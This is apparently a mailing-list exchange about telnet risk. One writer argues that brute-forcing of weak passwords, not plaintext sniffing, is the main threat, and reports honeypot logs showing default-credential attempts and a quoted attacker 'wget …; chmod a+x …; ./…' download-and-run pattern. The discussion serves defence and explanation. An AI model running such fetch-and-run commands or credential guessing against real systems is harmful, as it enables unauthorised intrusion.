As always, the best practice recommendation is to disable telnet logins entirely as it represents a security issue because passwords pass over the connection in clear plaintext.
- Brian
Well, the issue is not really the passwords being in plaintext. The issue is the availability of a remote login feature with possibly weak passwords. It affects SSH just as much as it affects telnet. The malvolents are scanning the IPv4 space and when they can connect to a remote logon service (telnet, SSH, RDP, VNC) they try a number of common usernames and passwords. They are not listening in on your traffic. While it is clear that telnet is not the most secure login service, it really doesn't make a difference.
I have a fake telnetd running on one of my systems that simply presents the user with a login prompt and logs what is being typed, and it shows endless connections trying things like root/12345 root/password admin/admin etc. They probably get into certain routers or other systems like that, then install some trojan that does further scanning. This is also indicated by certain loggings where they apparently believe they got logged in and then send a long string like "wget something; chmod a+x something; ./something" or similar.
Rob